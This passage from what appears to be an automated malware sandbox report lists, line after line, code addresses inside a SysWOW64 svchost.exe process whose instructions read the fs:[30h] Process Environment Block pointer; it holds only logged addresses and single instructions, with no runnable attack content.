                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h]2_2_0323A3C0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032383C0 mov eax, dword ptr fs:[00000030h]2_2_032383C0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032383C0 mov eax, dword ptr fs:[00000030h]2_2_032383C0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032383C0 mov eax, dword ptr fs:[00000030h]2_2_032383C0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032383C0 mov eax, dword ptr fs:[00000030h]2_2_032383C0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B63C0 mov eax, dword ptr fs:[00000030h]2_2_032B63C0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DE3DB mov eax, dword ptr fs:[00000030h]2_2_032DE3DB
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DE3DB mov eax, dword ptr fs:[00000030h]2_2_032DE3DB
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DE3DB mov ecx, dword ptr fs:[00000030h]2_2_032DE3DB
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DE3DB mov eax, dword ptr fs:[00000030h]2_2_032DE3DB
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D43D4 mov eax, dword ptr fs:[00000030h]2_2_032D43D4
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D43D4 mov eax, dword ptr fs:[00000030h]2_2_032D43D4
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322823B mov eax, dword ptr fs:[00000030h]2_2_0322823B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03234260 mov eax, dword ptr fs:[00000030h]2_2_03234260
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03234260 mov eax, dword ptr fs:[00000030h]2_2_03234260
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03234260 mov eax, dword ptr fs:[00000030h]2_2_03234260
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322826B mov eax, dword ptr fs:[00000030h]2_2_0322826B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]2_2_032E0274
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]2_2_032E0274
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]2_2_032E0274
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]2_2_032E0274
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]2_2_032E0274
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]2_2_032E0274
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]2_2_032E0274
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]2_2_032E0274
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]2_2_032E0274
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]2_2_032E0274
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]2_2_032E0274
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]2_2_032E0274
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B8243 mov eax, dword ptr fs:[00000030h]2_2_032B8243
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B8243 mov ecx, dword ptr fs:[00000030h]2_2_032B8243
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0330625D mov eax, dword ptr fs:[00000030h]2_2_0330625D
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322A250 mov eax, dword ptr fs:[00000030h]2_2_0322A250
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236259 mov eax, dword ptr fs:[00000030h]2_2_03236259
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EA250 mov eax, dword ptr fs:[00000030h]2_2_032EA250
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EA250 mov eax, dword ptr fs:[00000030h]2_2_032EA250
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032402A0 mov eax, dword ptr fs:[00000030h]2_2_032402A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032402A0 mov eax, dword ptr fs:[00000030h]2_2_032402A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C62A0 mov eax, dword ptr fs:[00000030h]2_2_032C62A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C62A0 mov ecx, dword ptr fs:[00000030h]2_2_032C62A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C62A0 mov eax, dword ptr fs:[00000030h]2_2_032C62A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C62A0 mov eax, dword ptr fs:[00000030h]2_2_032C62A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C62A0 mov eax, dword ptr fs:[00000030h]2_2_032C62A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C62A0 mov eax, dword ptr fs:[00000030h]2_2_032C62A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E284 mov eax, dword ptr fs:[00000030h]2_2_0326E284
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E284 mov eax, dword ptr fs:[00000030h]2_2_0326E284
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B0283 mov eax, dword ptr fs:[00000030h]2_2_032B0283
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B0283 mov eax, dword ptr fs:[00000030h]2_2_032B0283
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B0283 mov eax, dword ptr fs:[00000030h]2_2_032B0283
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032402E1 mov eax, dword ptr fs:[00000030h]2_2_032402E1
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032402E1 mov eax, dword ptr fs:[00000030h]2_2_032402E1
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032402E1 mov eax, dword ptr fs:[00000030h]2_2_032402E1
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A2C3 mov eax, dword ptr fs:[00000030h]2_2_0323A2C3
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A2C3 mov eax, dword ptr fs:[00000030h]2_2_0323A2C3
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A2C3 mov eax, dword ptr fs:[00000030h]2_2_0323A2C3
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A2C3 mov eax, dword ptr fs:[00000030h]2_2_0323A2C3
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A2C3 mov eax, dword ptr fs:[00000030h]2_2_0323A2C3
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033062D6 mov eax, dword ptr fs:[00000030h]2_2_033062D6
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03260124 mov eax, dword ptr fs:[00000030h]2_2_03260124
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h]2_2_032DE10E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DE10E mov ecx, dword ptr fs:[00000030h]2_2_032DE10E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h]2_2_032DE10E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h]2_2_032DE10E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DE10E mov ecx, dword ptr fs:[00000030h]2_2_032DE10E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h]2_2_032DE10E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h]2_2_032DE10E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DE10E mov ecx, dword ptr fs:[00000030h]2_2_032DE10E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h]2_2_032DE10E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DE10E mov ecx, dword ptr fs:[00000030h]2_2_032DE10E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DA118 mov ecx, dword ptr fs:[00000030h]2_2_032DA118
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DA118 mov eax, dword ptr fs:[00000030h]2_2_032DA118
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DA118 mov eax, dword ptr fs:[00000030h]2_2_032DA118
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DA118 mov eax, dword ptr fs:[00000030h]2_2_032DA118
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F0115 mov eax, dword ptr fs:[00000030h]2_2_032F0115
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304164 mov eax, dword ptr fs:[00000030h]2_2_03304164
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304164 mov eax, dword ptr fs:[00000030h]2_2_03304164
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C4144 mov eax, dword ptr fs:[00000030h]2_2_032C4144
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C4144 mov eax, dword ptr fs:[00000030h]2_2_032C4144
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C4144 mov ecx, dword ptr fs:[00000030h]2_2_032C4144
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C4144 mov eax, dword ptr fs:[00000030h]2_2_032C4144
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C4144 mov eax, dword ptr fs:[00000030h]2_2_032C4144
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322C156 mov eax, dword ptr fs:[00000030h]2_2_0322C156
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C8158 mov eax, dword ptr fs:[00000030h]2_2_032C8158
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236154 mov eax, dword ptr fs:[00000030h]2_2_03236154
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236154 mov eax, dword ptr fs:[00000030h]2_2_03236154
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03270185 mov eax, dword ptr fs:[00000030h]2_2_03270185
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EC188 mov eax, dword ptr fs:[00000030h]2_2_032EC188
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EC188 mov eax, dword ptr fs:[00000030h]2_2_032EC188
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D4180 mov eax, dword ptr fs:[00000030h]2_2_032D4180
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D4180 mov eax, dword ptr fs:[00000030h]2_2_032D4180
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B019F mov eax, dword ptr fs:[00000030h]2_2_032B019F
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B019F mov eax, dword ptr fs:[00000030h]2_2_032B019F
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B019F mov eax, dword ptr fs:[00000030h]2_2_032B019F
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B019F mov eax, dword ptr fs:[00000030h]2_2_032B019F
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322A197 mov eax, dword ptr fs:[00000030h]2_2_0322A197
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322A197 mov eax, dword ptr fs:[00000030h]2_2_0322A197
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322A197 mov eax, dword ptr fs:[00000030h]2_2_0322A197
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033061E5 mov eax, dword ptr fs:[00000030h]2_2_033061E5
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032601F8 mov eax, dword ptr fs:[00000030h]2_2_032601F8
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F61C3 mov eax, dword ptr fs:[00000030h]2_2_032F61C3
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F61C3 mov eax, dword ptr fs:[00000030h]2_2_032F61C3
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE1D0 mov eax, dword ptr fs:[00000030h]2_2_032AE1D0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE1D0 mov eax, dword ptr fs:[00000030h]2_2_032AE1D0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_032AE1D0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE1D0 mov eax, dword ptr fs:[00000030h]2_2_032AE1D0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE1D0 mov eax, dword ptr fs:[00000030h]2_2_032AE1D0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322A020 mov eax, dword ptr fs:[00000030h]2_2_0322A020
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322C020 mov eax, dword ptr fs:[00000030h]2_2_0322C020
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C6030 mov eax, dword ptr fs:[00000030h]2_2_032C6030
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B4000 mov ecx, dword ptr fs:[00000030h]2_2_032B4000
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]2_2_032D2000
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]2_2_032D2000
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]2_2_032D2000
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]2_2_032D2000
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]2_2_032D2000
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]2_2_032D2000
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]2_2_032D2000
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]2_2_032D2000
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324E016 mov eax, dword ptr fs:[00000030h]2_2_0324E016
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324E016 mov eax, dword ptr fs:[00000030h]2_2_0324E016
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324E016 mov eax, dword ptr fs:[00000030h]2_2_0324E016
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324E016 mov eax, dword ptr fs:[00000030h]2_2_0324E016
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325C073 mov eax, dword ptr fs:[00000030h]2_2_0325C073
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03232050 mov eax, dword ptr fs:[00000030h]2_2_03232050
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B6050 mov eax, dword ptr fs:[00000030h]2_2_032B6050
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032280A0 mov eax, dword ptr fs:[00000030h]2_2_032280A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C80A8 mov eax, dword ptr fs:[00000030h]2_2_032C80A8
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F60B8 mov eax, dword ptr fs:[00000030h]2_2_032F60B8
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F60B8 mov ecx, dword ptr fs:[00000030h]2_2_032F60B8
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323208A mov eax, dword ptr fs:[00000030h]2_2_0323208A
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0322A0E3
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032380E9 mov eax, dword ptr fs:[00000030h]2_2_032380E9
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B60E0 mov eax, dword ptr fs:[00000030h]2_2_032B60E0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322C0F0 mov eax, dword ptr fs:[00000030h]2_2_0322C0F0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032720F0 mov ecx, dword ptr fs:[00000030h]2_2_032720F0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B20DE mov eax, dword ptr fs:[00000030h]2_2_032B20DE
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326C720 mov eax, dword ptr fs:[00000030h]2_2_0326C720
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326C720 mov eax, dword ptr fs:[00000030h]2_2_0326C720
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326273C mov eax, dword ptr fs:[00000030h]2_2_0326273C
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326273C mov ecx, dword ptr fs:[00000030h]2_2_0326273C
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326273C mov eax, dword ptr fs:[00000030h]2_2_0326273C
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AC730 mov eax, dword ptr fs:[00000030h]2_2_032AC730
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326C700 mov eax, dword ptr fs:[00000030h]2_2_0326C700
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03230710 mov eax, dword ptr fs:[00000030h]2_2_03230710
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03260710 mov eax, dword ptr fs:[00000030h]2_2_03260710
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03238770 mov eax, dword ptr fs:[00000030h]2_2_03238770
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326674D mov esi, dword ptr fs:[00000030h]2_2_0326674D
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326674D mov eax, dword ptr fs:[00000030h]2_2_0326674D
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326674D mov eax, dword ptr fs:[00000030h]2_2_0326674D
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03230750 mov eax, dword ptr fs:[00000030h]2_2_03230750
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BE75D mov eax, dword ptr fs:[00000030h]2_2_032BE75D
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272750 mov eax, dword ptr fs:[00000030h]2_2_03272750
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272750 mov eax, dword ptr fs:[00000030h]2_2_03272750
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B4755 mov eax, dword ptr fs:[00000030h]2_2_032B4755
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032307AF mov eax, dword ptr fs:[00000030h]2_2_032307AF
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E47A0 mov eax, dword ptr fs:[00000030h]2_2_032E47A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D678E mov eax, dword ptr fs:[00000030h]2_2_032D678E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032527ED mov eax, dword ptr fs:[00000030h]2_2_032527ED
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032527ED mov eax, dword ptr fs:[00000030h]2_2_032527ED
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032527ED mov eax, dword ptr fs:[00000030h]2_2_032527ED
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BE7E1 mov eax, dword ptr fs:[00000030h]2_2_032BE7E1
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032347FB mov eax, dword ptr fs:[00000030h]2_2_032347FB
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032347FB mov eax, dword ptr fs:[00000030h]2_2_032347FB
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323C7C0 mov eax, dword ptr fs:[00000030h]2_2_0323C7C0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B07C3 mov eax, dword ptr fs:[00000030h]2_2_032B07C3
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324E627 mov eax, dword ptr fs:[00000030h]2_2_0324E627
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03266620 mov eax, dword ptr fs:[00000030h]2_2_03266620
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03268620 mov eax, dword ptr fs:[00000030h]2_2_03268620
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323262C mov eax, dword ptr fs:[00000030h]2_2_0323262C
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE609 mov eax, dword ptr fs:[00000030h]2_2_032AE609
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]2_2_0324260B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]2_2_0324260B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]2_2_0324260B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]2_2_0324260B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]2_2_0324260B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]2_2_0324260B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]2_2_0324260B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272619 mov eax, dword ptr fs:[00000030h]2_2_03272619
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F866E mov eax, dword ptr fs:[00000030h]2_2_032F866E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F866E mov eax, dword ptr fs:[00000030h]2_2_032F866E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A660 mov eax, dword ptr fs:[00000030h]2_2_0326A660
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A660 mov eax, dword ptr fs:[00000030h]2_2_0326A660
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03262674 mov eax, dword ptr fs:[00000030h]2_2_03262674
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324C640 mov eax, dword ptr fs:[00000030h]2_2_0324C640
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326C6A6 mov eax, dword ptr fs:[00000030h]2_2_0326C6A6
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032666B0 mov eax, dword ptr fs:[00000030h]2_2_032666B0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03234690 mov eax, dword ptr fs:[00000030h]2_2_03234690
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03234690 mov eax, dword ptr fs:[00000030h]2_2_03234690
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE6F2 mov eax, dword ptr fs:[00000030h]2_2_032AE6F2
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE6F2 mov eax, dword ptr fs:[00000030h]2_2_032AE6F2
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE6F2 mov eax, dword ptr fs:[00000030h]2_2_032AE6F2
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE6F2 mov eax, dword ptr fs:[00000030h]2_2_032AE6F2
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B06F1 mov eax, dword ptr fs:[00000030h]2_2_032B06F1
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B06F1 mov eax, dword ptr fs:[00000030h]2_2_032B06F1
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0326A6C7
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A6C7 mov eax, dword ptr fs:[00000030h]2_2_0326A6C7
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]2_2_03240535
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]2_2_03240535
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]2_2_03240535
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]2_2_03240535
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]2_2_03240535
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]2_2_03240535
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E53E mov eax, dword ptr fs:[00000030h]2_2_0325E53E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E53E mov eax, dword ptr fs:[00000030h]2_2_0325E53E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E53E mov eax, dword ptr fs:[00000030h]2_2_0325E53E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E53E mov eax, dword ptr fs:[00000030h]2_2_0325E53E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E53E mov eax, dword ptr fs:[00000030h]2_2_0325E53E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C6500 mov eax, dword ptr fs:[00000030h]2_2_032C6500
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]2_2_03304500
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]2_2_03304500
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]2_2_03304500
